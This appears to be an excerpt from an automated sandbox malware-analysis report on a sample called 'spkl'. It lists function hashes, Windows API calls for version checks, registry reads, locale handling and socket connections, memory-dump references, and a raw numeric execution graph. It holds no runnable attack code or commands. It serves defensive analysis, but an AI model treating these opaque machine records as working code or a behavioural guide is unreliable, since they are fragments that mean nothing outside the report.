                                                                                                                                                                                                                                                            • String ID: xWA
                                                                                                                                                                                                                                                            • API String ID: 3490077880-1367497327
                                                                                                                                                                                                                                                            • Opcode ID: 7834924e49ed803de3fe2c12ecb0426b0801b3f8a8d27bc0a268189d23c4f520
                                                                                                                                                                                                                                                            • Instruction ID: 13bf23e1329b6ed62b51f5b22f85bd001d496eff14c6d4ab5e25a17571e484f8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7834924e49ed803de3fe2c12ecb0426b0801b3f8a8d27bc0a268189d23c4f520
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1314FB0A002209BDF21AF29848935636A4BB05314F17557BE90AF72C6D77CDCA4CB5E
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(0000009C), ref: 033D0652
                                                                                                                                                                                                                                                              • Part of subcall function 033D0A84: GetVersionExA.KERNEL32(?,?,00000000,?,033D0615), ref: 033D0ADB
                                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(0000009C), ref: 033D0621
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33c0000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Version
                                                                                                                                                                                                                                                            • String ID: ProductType$System\CurrentControlSet\Control\ProductOptions$WINNT
                                                                                                                                                                                                                                                            • API String ID: 1889659487-3392522142
                                                                                                                                                                                                                                                            • Opcode ID: dcc7f2d22e379ad6dfa4df60e2ea234919274a4eb25614f73adada6180d6e90c
                                                                                                                                                                                                                                                            • Instruction ID: 27f187cd09a20afe70f693569591fdbb9fc5f5513cf774f7dbdae42b63ef4b2b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dcc7f2d22e379ad6dfa4df60e2ea234919274a4eb25614f73adada6180d6e90c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7611C63AF483489EEB19DAB4ACD179EBBACDB46B00F5400A6F445DA581D7348944CB11
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 033AA1D1
                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 033AA1F5
                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(033E84D4,?,00000105,?,?,00000105), ref: 033AA210
                                                                                                                                                                                                                                                            • LoadStringA.USER32(00000000,033A6500,?,00000100), ref: 033AA2A6
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3990497365-0
                                                                                                                                                                                                                                                            • Opcode ID: b33908c3ea961f38c1c20a218da89d08438d508a93e0bf8ee96641284d900041
                                                                                                                                                                                                                                                            • Instruction ID: 606197bfacb4fde8493b9b662577f0abdb82fe26776f7e09cadc884024d2d0f3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b33908c3ea961f38c1c20a218da89d08438d508a93e0bf8ee96641284d900041
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9541F975E007589BDB61DB6CCDC4BDAB7BCEB08200F0441E6A548EB251D7759B94CF50
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 033AA1D1
                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 033AA1F5
                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(033E84D4,?,00000105,?,?,00000105), ref: 033AA210
                                                                                                                                                                                                                                                            • LoadStringA.USER32(00000000,033A6500,?,00000100), ref: 033AA2A6
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3990497365-0
                                                                                                                                                                                                                                                            • Opcode ID: 62fae7104696962fb12e7c423b13beb0c35631b62ef8824cb2b99c4462e4a6df
                                                                                                                                                                                                                                                            • Instruction ID: 6811ee79761b742e1a48b8d75870ad7541ff43264f2a06415d4563063e496d69
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62fae7104696962fb12e7c423b13beb0c35631b62ef8824cb2b99c4462e4a6df
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E411875A00B589BDB21EB6CCCC4B9AB7ACEB08200F0400E5A508EB281D7759F98CB50
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040A4A9
                                                                                                                                                                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040A50B
                                                                                                                                                                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040A568
                                                                                                                                                                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040A59B
                                                                                                                                                                                                                                                              • Part of subcall function 0040A454: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040A519), ref: 0040A46B
                                                                                                                                                                                                                                                              • Part of subcall function 0040A454: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040A519), ref: 0040A488
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_401000_spkl.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Thread$LanguagesPreferred$Language
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2255706666-0
                                                                                                                                                                                                                                                            • Opcode ID: 7b5e2f4acab465ac740fddfc8bbe14d4735fe02a7006d7964869ae54b44f81e9
                                                                                                                                                                                                                                                            • Instruction ID: fc7280abbee8b3a4e0e2c491acc4ca4769cbef175c5e1049a2e5b08ff8261c60
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b5e2f4acab465ac740fddfc8bbe14d4735fe02a7006d7964869ae54b44f81e9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4319230A0021AABCF00EFA9CC94AAEB3B5FF04304F00417AE515F72D2D7789A44CB55
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00020019,?), ref: 033ACFA6
                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,00020019,?), ref: 033ACFD4
                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000003,?,?,?,00000000,00000000,?,00000000,?,?,00000000,00000000,00020019), ref: 033AD004
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,?,00000000,00000000,00020019,?), ref: 033AD010
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: QueryValue$CloseOpen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1586453840-0
                                                                                                                                                                                                                                                            • Opcode ID: 7a62b787932e1564d002dea452f8c82385cbcbdae5758abb1af2206b4e5d6699
                                                                                                                                                                                                                                                            • Instruction ID: c36bcd6b56c79f4f452a39dabbc82418a4816bcd8810d4c325a1b12c19fa0c62
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7a62b787932e1564d002dea452f8c82385cbcbdae5758abb1af2206b4e5d6699
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C11A076E00618BFDB10DAA9CCC5EEFB7FCEB05250F044566F914EB240E7749A448B90
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,033A9F6F,?,?,00000000), ref: 033A9EF0
                                                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000004,00000000,033A9F6F,?,?,00000000), ref: 033A9F20
                                                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000003,Function_00008E24,00000000,00000000,00000004,00000000,033A9F6F,?,?,00000000), ref: 033A9F49
                                                                                                                                                                                                                                                            • EnumCalendarInfoA.KERNEL32(Function_00008E60,00000000,00000000,00000003), ref: 033A9F54
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LocaleThread$CalendarEnumInfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1139405593-0
                                                                                                                                                                                                                                                            • Opcode ID: 78bad0378635fb6eec81227563e74c19279c1f7c82bc8dad5f463a00730bc483
                                                                                                                                                                                                                                                            • Instruction ID: 09e3120b0d6ab29b299b9ad8164c9c2c516b562065cd0ce91c4fc1ef697aff9c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78bad0378635fb6eec81227563e74c19279c1f7c82bc8dad5f463a00730bc483
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0401F238A04F0C6EEB01E77C8C82F5F779CDB86620F120660F510AE6C1EB399E0186A4
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,033A8A7E), ref: 033A8A26
                                                                                                                                                                                                                                                            • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,033A8A7E), ref: 033A8A2C
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DateFormatLocaleThread
                                                                                                                                                                                                                                                            • String ID: yyyy
                                                                                                                                                                                                                                                            • API String ID: 3303714858-3145165042
                                                                                                                                                                                                                                                            • Opcode ID: b86a1b3088fde0da537e4741e8ef2fceb98858969ec695a5742b3f94010094f4
                                                                                                                                                                                                                                                            • Instruction ID: 6a19728c83b90a99aa3e03c1de0d14c80bcb0e059952be0ed469b4f33f549dfb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b86a1b3088fde0da537e4741e8ef2fceb98858969ec695a5742b3f94010094f4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0216D7CA04A18AFDB00EFACC8C1AAEB7BCEF08710F5004A5E905DB751D6349E04CB65
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,?,00000000,?,033D0615), ref: 033D0ADB
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • \SYSTEM\CurrentControlSet\Control\Windows\, xrefs: 033D0AF1
                                                                                                                                                                                                                                                            • CSDVersion, xrefs: 033D0AEC
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33c0000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Version
                                                                                                                                                                                                                                                            • String ID: CSDVersion$\SYSTEM\CurrentControlSet\Control\Windows\
                                                                                                                                                                                                                                                            • API String ID: 1889659487-4130263263
                                                                                                                                                                                                                                                            • Opcode ID: 0c59d6350f159b8bca881b40f5022a0b51f37928ed94f1ea653fcd2ee967cb2c
                                                                                                                                                                                                                                                            • Instruction ID: 4bd2b565248af7e7a68e4bc3f9c33014b1c97fb050c65f3b71d1c6509ceb4922
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c59d6350f159b8bca881b40f5022a0b51f37928ed94f1ea653fcd2ee967cb2c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A11087AF183488FE728DB74ECD1B5EB7A8E745B08F8040B5E0089A682D774DD44CB14
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                                                                                                            • API String ID: 3535843008-4173385793
                                                                                                                                                                                                                                                            • Opcode ID: 1104a72df2f78a8d9182208aaed285fb10a043c5c98daf1bace15bc076d03830
                                                                                                                                                                                                                                                            • Instruction ID: 95bc400add21a54f9495eac5801001a2e739eef588d522dffeb090ce64fbb64a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1104a72df2f78a8d9182208aaed285fb10a043c5c98daf1bace15bc076d03830
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD017179A48B08BEDB11EF94DD82BEE77ACEB05B00F1009A1F910EA980E7755A50C758

                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                            Execution Coverage:2.7%
                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                            Signature Coverage:18.1%
                                                                                                                                                                                                                                                            Total number of Nodes:890
                                                                                                                                                                                                                                                            Total number of Limit Nodes:61
                                                                                                                                                                                                                                                            execution_graph 37448 239a20 SetConsoleMode 37449 239a47 malloc 37448->37449 37450 239a6b 37449->37450 37458 243a50 37450->37458 37455 239ae8 strcmp 37457 239afc 37455->37457 37456 239b5d SetConsoleMode 37457->37456 37459 243a60 37458->37459 37460 243b0f WSAStartup 37459->37460 37466 243ad2 37459->37466 37471 239a74 37459->37471 37461 243b25 37460->37461 37460->37471 37462 243b30 37461->37462 37463 243b3f WSACleanup 37461->37463 37486 24c0a0 37462->37486 37463->37471 37466->37471 37479 24a740 37466->37479 37469 243ae7 37469->37471 37485 241ae0 12 API calls 37469->37485 37472 239de0 37471->37472 37473 239e15 37472->37473 37474 239def fwrite 37472->37474 37521 243610 37473->37521 37524 243690 9 API calls 37474->37524 37477 239e12 37477->37473 37480 24a74b socket 37479->37480 37483 243ae0 37479->37483 37481 24a75c 37480->37481 37480->37483 37494 244ff0 37481->37494 37484 2bf870 14 API calls 37483->37484 37484->37469 37485->37471 37487 24c0b0 37486->37487 37488 24c0aa 37486->37488 37498 2518c0 37487->37498 37488->37466 37493 24c0e6 GetProcAddress 37493->37488 37495 24502a closesocket 37494->37495 37497 244ffe 37494->37497 37496 245035 37495->37496 37496->37483 37497->37495 37497->37496 37499 24c0bd 37498->37499 37500 2518dc memset 37498->37500 37505 251990 GetModuleHandleA 37499->37505 37501 25192c VerSetConditionMask VerSetConditionMask VerSetConditionMask VerSetConditionMask 37500->37501 37502 251928 37500->37502 37503 251966 VerifyVersionInfoA 37501->37503 37504 25195a VerSetConditionMask 37501->37504 37502->37501 37503->37499 37504->37503 37506 24c0d5 37505->37506 37507 2519a9 GetProcAddress strpbrk 37505->37507 37506->37488 37506->37493 37508 2519d7 37507->37508 37509 2519cf 37507->37509 37512 251a06 GetSystemDirectoryA 37508->37512 37513 2519db GetProcAddress 37508->37513 37510 2519d3 37509->37510 37511 2519fa LoadLibraryA 37509->37511 37516 2519f0 LoadLibraryExA 37510->37516 37511->37506 37512->37506 37515 251a14 strlen 37512->37515 37513->37512 37514 2519eb 37513->37514 37514->37516 37517 251a2d 37515->37517 37516->37506 37517->37506 37518 251a38 GetSystemDirectoryA 37517->37518 37518->37506 37519 251a44 strlen strlen strcpy 37518->37519 37519->37506 37520 251a7a LoadLibraryA 37519->37520 37520->37506 37525 2420f0 37521->37525 37524->37477 37526 24215a 37525->37526 37535 242118 37525->37535 37530 242afe strlen 37526->37530 37532 239ad4 free 37526->37532 37533 2429cf strlen 37526->37533 37536 243127 memset 37526->37536 37537 242d6e sprintf 37526->37537 37527 242210 strncmp 37528 242224 strncmp 37527->37528 37527->37535 37529 24224e strncmp 37528->37529 37528->37535 37529->37535 37530->37526 37531 24227f strtol 37531->37527 37532->37455 37532->37457 37533->37526 37534 242445 strtol 37534->37527 37535->37526 37535->37527 37535->37529 37535->37531 37535->37532 37535->37534 37536->37526 37537->37526 37538 2322e0 37539 232356 37538->37539 37548 241d00 getenv 37539->37548 37542 232373 strtol 37543 23239a 37542->37543 37544 23238a strlen 37542->37544 37545 2323c7 GetStdHandle 37543->37545 37546 2323b9 37543->37546 37544->37543 37545->37546 37547 2323d4 GetConsoleScreenBufferInfo 37545->37547 37547->37546 37549 241d21 ExpandEnvironmentStringsA 37548->37549 37550 23236c 37548->37550 37549->37550 37550->37542 37550->37543 37551 2391c0 37553 2391d6 37551->37553 37564 239372 37551->37564 37552 23920b strcmp 37552->37553 37553->37552 37554 235a00 17 API calls 37553->37554 37555 2392f9 37553->37555 37556 239268 malloc 37553->37556 37554->37553 37557 239377 37555->37557 37558 23934d strcmp 37555->37558 37555->37564 37559 239283 37556->37559 37561 239de0 10 API calls 37557->37561 37558->37557 37560 23935f 37558->37560 37559->37553 37559->37555 37565 2392c7 37559->37565 37566 2327c0 memset 37559->37566 37563 239de0 10 API calls 37560->37563 37561->37564 37563->37564 37565->37555 37566->37559 37567 254a21 37568 254a33 37567->37568 37569 256e3a realloc 37568->37569 37570 256e51 37568->37570 37569->37570 37571 24dc60 37584 243380 37571->37584 37576 24dc9a WSAGetLastError 37580 24dca6 WSAGetLastError 37576->37580 37581 24dcae 37576->37581 37577 24dcbb EnterCriticalSection 37578 24dd7d LeaveCriticalSection 37577->37578 37579 24dccd LeaveCriticalSection 37577->37579 37583 24dcea 37578->37583 37582 24dcdb DeleteCriticalSection 37579->37582 37579->37583 37580->37581 37581->37577 37582->37583 37585 2420f0 9 API calls 37584->37585 37586 2433b5 37585->37586 37587 27cd00 getaddrinfo 37586->37587 37588 24dc93 37587->37588 37592 27cd33 37587->37592 37588->37576 37588->37577 37589 27cea3 WSASetLastError 37589->37588 37590 27ce61 freeaddrinfo 37591 27ce68 37590->37591 37591->37588 37591->37589 37592->37589 37593 27cdfa memcpy 37592->37593 37594 27ce3b 37592->37594 37593->37592 37594->37590 37594->37591 37595 24d8c0 37626 249a20 memchr memchr memchr _errno memchr 37595->37626 37597 24d8ee 37598 24d8f5 37597->37598 37627 249a20 memchr memchr memchr _errno memchr 37597->37627 37639 27d060 htons 37598->37639 37601 24d917 37601->37598 37603 24d936 37601->37603 37602 24d92b 37604 24d95e 37603->37604 37605 24a740 2 API calls 37603->37605 37606 243380 9 API calls 37604->37606 37605->37604 37607 24d9b6 37606->37607 37628 25d170 37607->37628 37609 24dbf5 _errno 37649 267140 13 API calls 37609->37649 37610 24d9be 37612 24db10 37610->37612 37613 24da8e InitializeCriticalSection 37610->37613 37619 24db02 37610->37619 37615 24db34 37612->37615 37616 24db22 DeleteCriticalSection 37612->37616 37617 24daa7 37613->37617 37614 24dc08 37624 24daf7 37614->37624 37615->37619 37616->37615 37617->37612 37618 24dab1 37617->37618 37620 24dbd4 37618->37620 37638 283f40 _beginthreadex 37618->37638 37619->37609 37640 24d4b0 37620->37640 37622 24daea 37622->37624 37625 24dbdb _errno 37622->37625 37625->37620 37626->37597 37627->37601 37629 25d186 37628->37629 37630 25d190 37628->37630 37631 25d1cb QueryPerformanceCounter 37629->37631 37632 25d18b 37629->37632 37633 2518c0 7 API calls 37630->37633 37636 25d1fe 37631->37636 37634 25d251 GetTickCount 37632->37634 37635 25d19d 37633->37635 37634->37636 37635->37632 37637 25d1a8 QueryPerformanceFrequency 37635->37637 37636->37610 37637->37631 37637->37634 37638->37622 37639->37602 37641 24d4c0 EnterCriticalSection LeaveCriticalSection 37640->37641 37648 24d50b 37640->37648 37642 24d4e6 37641->37642 37643 24d59d 37641->37643 37644 24d4f3 37642->37644 37650 283f80 WaitForSingleObject CloseHandle 37642->37650 37651 283f70 CloseHandle 37643->37651 37647 24d4fc DeleteCriticalSection 37644->37647 37644->37648 37647->37648 37648->37619 37649->37614 37650->37644 37651->37648 37652 269380 37653 2693a4 memset 37652->37653 37661 269460 37653->37661 37656 269415 37657 2693ee 37657->37656 37658 2693f7 37657->37658 37676 269200 37657->37676 37658->37656 37696 2685c0 15 API calls 37658->37696 37662 269480 37661->37662 37663 2694ad calloc 37662->37663 37668 26990c 37662->37668 37664 2694cd 37663->37664 37663->37668 37665 25d170 10 API calls 37664->37665 37664->37668 37666 269571 37665->37666 37667 25d170 10 API calls 37666->37667 37674 269582 37667->37674 37668->37657 37669 2698c9 37669->37668 37670 2699a7 37669->37670 37671 2698f8 37669->37671 37699 28a7b0 80 API calls 37670->37699 37698 28a340 11 API calls 37671->37698 37674->37668 37674->37669 37697 2433e0 9 API calls 37674->37697 37700 25f240 10 API calls 37676->37700 37678 25d170 10 API calls 37679 26928a 37678->37679 37681 26929f 37679->37681 37682 2692fc 37679->37682 37680 269215 37686 26926a 37680->37686 37692 2692f4 37680->37692 37712 2433e0 9 API calls 37680->37712 37713 25f240 10 API calls 37681->37713 37701 245170 37682->37701 37686->37678 37686->37692 37687 2692a7 37714 25f240 10 API calls 37687->37714 37689 2692b2 37715 244700 37689->37715 37691 25d170 10 API calls 37691->37692 37692->37658 37695 26930f 37695->37691 37695->37692 37696->37656 37697->37669 37698->37668 37699->37668 37700->37680 37702 25d170 10 API calls 37701->37702 37703 245180 37702->37703 37704 245280 37703->37704 37709 2451e8 37703->37709 37857 267140 13 API calls 37704->37857 37706 24528b 37707 245279 37706->37707 37707->37695 37709->37707 37710 24525c 37709->37710 37752 2452b0 37709->37752 37710->37707 37856 246090 23 API calls 37710->37856 37712->37686 37713->37687 37714->37689 37716 2447af 37715->37716 37717 24471f 37715->37717 37716->37695 37741 266fb0 37716->37741 37718 244737 memcpy 37717->37718 37719 2447b7 getpeername 37717->37719 37718->37716 37720 2447f4 getsockname 37719->37720 37721 2447d9 WSAGetLastError 37719->37721 37723 244845 37720->37723 37724 24481e WSAGetLastError 37720->37724 37896 249f70 35 API calls 37721->37896 37726 244690 20 API calls 37723->37726 37897 249f70 35 API calls 37724->37897 37727 244860 37726->37727 37729 244867 memcpy 37727->37729 37730 24489c _errno 37727->37730 37732 244690 20 API calls 37729->37732 37733 2448aa 37730->37733 37731 24483d 37731->37716 37734 24488e 37732->37734 37899 249f70 35 API calls 37733->37899 37736 244895 37734->37736 37737 2448c1 _errno 37734->37737 37736->37718 37739 2448cf 37737->37739 37738 2447e8 37898 267140 13 API calls 37738->37898 37900 249f70 35 API calls 37739->37900 37742 266fc8 37741->37742 37751 26704c 37741->37751 37742->37751 37901 242090 9 API calls 37742->37901 37744 266ff7 37745 267001 strlen 37744->37745 37746 267038 strlen 37744->37746 37748 267011 37745->37748 37747 267078 fwrite fwrite 37746->37747 37746->37751 37747->37751 37749 243380 9 API calls 37748->37749 37750 267035 37749->37750 37750->37746 37751->37695 37858 245c20 37752->37858 37754 2452e0 37755 2452e9 37754->37755 37863 244690 37754->37863 37755->37709 37758 245408 _errno 37760 245416 37758->37760 37759 266fb0 13 API calls 37761 24532c 37759->37761 37879 249f70 35 API calls 37760->37879 37764 245398 37761->37764 37765 24534a 37761->37765 37763 24541e 37880 267140 13 API calls 37763->37880 37766 2450d0 9 API calls 37764->37766 37768 245390 37765->37768 37769 24535b setsockopt 37765->37769 37788 2453a2 37766->37788 37870 2450d0 37768->37870 37772 245385 37769->37772 37773 245582 WSAGetLastError 37769->37773 37771 245431 37775 244ff0 closesocket 37771->37775 37777 266fb0 13 API calls 37772->37777 37881 249f70 35 API calls 37773->37881 37779 24543e 37775->37779 37777->37768 37778 2455bb setsockopt 37781 24566f 37778->37781 37786 2455e0 37778->37786 37785 245446 37779->37785 37780 24558f 37782 266fb0 13 API calls 37780->37782 37783 266fb0 13 API calls 37781->37783 37782->37768 37783->37788 37784 2454a6 37878 24c470 ioctlsocket 37784->37878 37785->37784 37791 245540 37785->37791 37792 2454d1 strlen 37785->37792 37789 245615 WSAIoctl 37786->37789 37788->37785 37802 2453f4 37788->37802 37789->37788 37793 245654 WSAGetLastError 37789->37793 37790 2459ea 37794 25d170 10 API calls 37790->37794 37796 245887 htons 37791->37796 37797 245550 37791->37797 37792->37791 37795 2454e8 memset strncmp 37792->37795 37798 266fb0 13 API calls 37793->37798 37799 2459f2 37794->37799 37800 24551a strncmp 37795->37800 37810 245537 37795->37810 37811 245578 37796->37811 37801 24555e htons 37797->37801 37797->37811 37798->37788 37831 245a18 37799->37831 37892 246090 23 API calls 37799->37892 37800->37810 37816 2456f6 37800->37816 37801->37811 37804 244ff0 closesocket 37802->37804 37803 2458e0 bind 37806 245929 getsockname 37803->37806 37803->37811 37807 2453fb 37804->37807 37813 2459a1 WSAGetLastError 37806->37813 37814 245958 37806->37814 37807->37758 37808 245a96 connect 37809 245a31 WSAGetLastError 37808->37809 37808->37831 37809->37831 37818 245701 37810->37818 37819 2456c2 37810->37819 37811->37803 37812 2458ef WSAGetLastError 37811->37812 37815 266fb0 13 API calls 37811->37815 37888 249f70 35 API calls 37812->37888 37890 249f70 35 API calls 37813->37890 37821 266fb0 13 API calls 37814->37821 37822 2458c3 htons 37815->37822 37830 245834 37816->37830 37883 25dd20 74 API calls 37816->37883 37825 266fb0 13 API calls 37818->37825 37819->37816 37832 2456d3 37819->37832 37835 2456e2 37819->37835 37821->37835 37822->37803 37824 24590c 37889 267140 13 API calls 37824->37889 37851 24571f 37825->37851 37828 24577e 37833 245791 37828->37833 37884 24d660 37 API calls 37828->37884 37886 267140 13 API calls 37830->37886 37831->37808 37831->37809 37838 266fb0 13 API calls 37831->37838 37847 244ff0 closesocket 37831->37847 37893 249f70 35 API calls 37831->37893 37882 267140 13 API calls 37832->37882 37833->37830 37842 2457aa 37833->37842 37834 244ff0 closesocket 37834->37835 37835->37784 37835->37813 37835->37834 37891 267140 13 API calls 37835->37891 37836 245866 37887 249a20 memchr memchr memchr _errno memchr 37836->37887 37837 245806 37837->37811 37843 24580f strchr 37837->37843 37838->37831 37885 25d820 18 API calls 37842->37885 37846 245829 37843->37846 37894 249a20 memchr memchr memchr _errno memchr 37846->37894 37847->37831 37848 24587a 37848->37796 37848->37811 37849 2457c0 37850 266fb0 13 API calls 37849->37850 37850->37851 37851->37836 37851->37837 37853 245ad8 37853->37811 37854 245ae4 htons 37853->37854 37854->37811 37855 245afe atoi 37854->37855 37855->37811 37856->37707 37857->37706 37859 245c66 37858->37859 37860 245c69 memcpy 37858->37860 37859->37860 37861 245ce8 socket 37860->37861 37862 245c99 37860->37862 37861->37862 37862->37754 37864 2446a7 37863->37864 37865 2446df _errno 37864->37865 37895 24a7f0 18 API calls 37864->37895 37866 2446f6 37865->37866 37866->37758 37866->37759 37868 2446c1 37868->37865 37869 2446c8 htons 37868->37869 37869->37866 37871 2450f5 37870->37871 37877 24510d 37870->37877 37872 245123 getsockopt 37871->37872 37873 2518c0 7 API calls 37871->37873 37874 245144 37872->37874 37875 24514d setsockopt 37872->37875 37876 245106 37873->37876 37874->37875 37874->37877 37875->37877 37876->37872 37876->37877 37877->37778 37877->37788 37878->37790 37879->37763 37880->37771 